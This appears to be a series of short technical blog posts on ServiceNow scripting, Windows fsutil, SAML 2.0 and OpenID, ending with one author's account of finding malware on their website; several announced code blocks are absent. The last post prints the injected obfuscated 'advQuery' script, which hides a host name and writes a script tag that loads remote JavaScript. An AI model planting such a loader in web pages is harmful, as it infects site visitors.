Because ServiceNow is a framed application, I often get asked by customers how to deal with any potential nested frame issues.

There are many ways to handle this, but often times it boils down to just inserting frame-busting javascript code in the right place.

An HTML document with the following javascript code snippet will detect if it is being displayed within a frame as it loads. If it is, it will break out of the frame and show that page as the main document in the browser.

Here is the code:

This code snippet is designed to go within the BODY of the HTML document.

I ran into situation the other day where I had been doing a Javascript “Replace” function on a string of text. The Javascript replace looked intriguing because I could use a regular expression and have it replaced with a give string through an entire text. The product requirements insisted that this would only be a few KB of text at any given time. So, we implemented the replace, ran some tests and went live.

It didn’t take long, however, before we started running into huge performance issues on the instance. When we tracked it down, we found that the end user was sending in data in the size of MB and that while the Javascript replace function performed just fine for a few hundred KB, it’s response time grew exponentially with the bigger string sizes. A 1.5MB string was taking over 10 minutes to perform the replace.

At this point, we decided to convert the string to a Java string object through ServiceNow’s package calls.

Once I did this, the replace mechanism took only milliseconds on even the larger files.

The other day I needed to do some testing with files of a very specific size. I was on a Windows PC that day, so I needed to find a tool that would work on a windows machine. I originally had thought to give it a spin in Python or Perl, but before I got my hands too wet I found a built in program in Windows XP and later versions that would quickly and easily do this for me.

Here is the command format:
“fsutil file createnew <fullpathtofile> <sizeinbytes>”

So, if you wanted to create a 100 kb file named “myfile.txt” in “c:\mytestfiles”, your command would look like this:
“fsutil file createnew c:\mytestfiles\myfile.txt 100000″

This creates a file of exactly 100kb at the location you specify. Really quite a handy tool to have around.

Let’s say that I have a string that I need to pull some data out of for another function. Regular Expressions are a powerful and reliable way to do this. When you combine Groups with Regular Expressions, they become even more handy.

Let’s say that I have a string that contains a domain name, a slash, and then a username. I only want the username.

You can easily pull the username out of the string by using a script just like the following:

Playing around with SAML 2.0 some more. Here is some code that I created that allowed me to create a SAML 2.0 AuthnRequest object to be submitted to an Identity Provider.

I recently created a SAML 2.0 Service Provider using PHP. I used the AuthnRequest Protocol with HTTP-POST binding. This was done to help me understand the basic SAML 2.0 exchanges between a Service Provider and an Identity Provider.

Here is an exhaustive analysis of my Service Provider logs that I created.

The service provider that I created had the url of: http://saml20.abilityweb.us

I have a user created on the SSO Circle Identity Provider. I added my test Service Provider to my SSO Circle account as an authorized service provider. During that process I uploaded the following meta data to the SSO Circle Identity Provider for my PHP Service Provider:

I chose to use the HTTP-POST binding along with the AuthnRequest Protocol for SAML Authentication

My url that is supposed to process the response to my AuthnRequest is: http://saml20sp.abilityweb.us/spdbg/home.php

My AuthnRequest that was generated by the test Service Provider I created looked like this:

The request is then DEFLATED:

Then it is encoded in Base64 encoding and also URL encoded:

The deflated/encoded AuthnRequest is then sent via https to the identity provider along with the Relay State (the URL on my service provider that will handle the response):

The Identify provider processes this request and handles the authentication. Upon successful authentication, it sends back a base64 encoded response:

The string is decoded by the service provider into the following:

When the user wants to logout, I generate the following:

That request is first DEFLATED, then Base64 encoded, and then URL Encoded to be:

Which is then sent over https via:

Where the Identity Provider processed the logout and returned us to our RelayState url.

This may be a little quick and dirty, but if you know your date string format is going to always be in a particular format, it is easy to convert that date string into a string that could be interpreted by the Date object constructor. Here is an example of such an effort:

I was having problems with the Java library that I was using to DEFLATE the authentication request before I sent it to the IdP. I found a great SAML debug tool that helped me out immensely.

Here it is below:

I have been spending the past day working with OpenID an getting it to work on a couple of different portals/web applications. OpenID works really well and I highly recommend it as an alternative method of authentication.

In order to get started accepting OpenID credentials in your authentication model, or even to get started using OpenID at all, you need to follow some of these steps. I’ll also mark some of the tools that might be helpful.

First, get an OpenID yourself. Whether you are going to write an authentication module or just use OpenID, you will need to get an ID. OpenID is a type of protocol or method. There is not any one place that you can get an OpenID. There are many providers of such ID’s. You can also be your own provider. I happened to create an openID at myopenid.com. However you can search through a number of providers in this openID providers list.

Once you have an OpenID, you will notice that it is not your typical username. An openID is a URL. For example, one of my test openID’s is: http://ttest123.myopenid.com.

Now you can try using your OpenID. One great resource to finding OpenID enabled sites it to browse the following OpenID site directory: http://openiddirectory.com/.

If you are going to enable one of your web applications to use OpenID, I would recommend a site that lists many already created libraries for OpenID in a number of languages. The best resource I know is this OpenID Library list.

Use the examples in the libraries that you download to understand how to easily integrate OpenID into your own Authentication System.

The way I found this out – other than getting malware notices from Google, was to do a wireshark trace on the offending website. From there I saw some interesting requests. Upon closer inspection, I found a piece of code with this function that I did not recognize:

function advQuery(){
var Host=”http://google.com/”;Track=”/if.php”;get=unescape(”%6E%65%74″);
document.write(unescape(”%3Cscript src=’”+Host.substr(0,9)+unescape(”\u0030\u0030″)+Host.substr(9,5)+get));
document.write(unescape(Track+”‘ type=’text/javascript’%3E%3C/script%3E”));
};advQuery();

It is easy enough to clear up, but now I need to find out how it got there!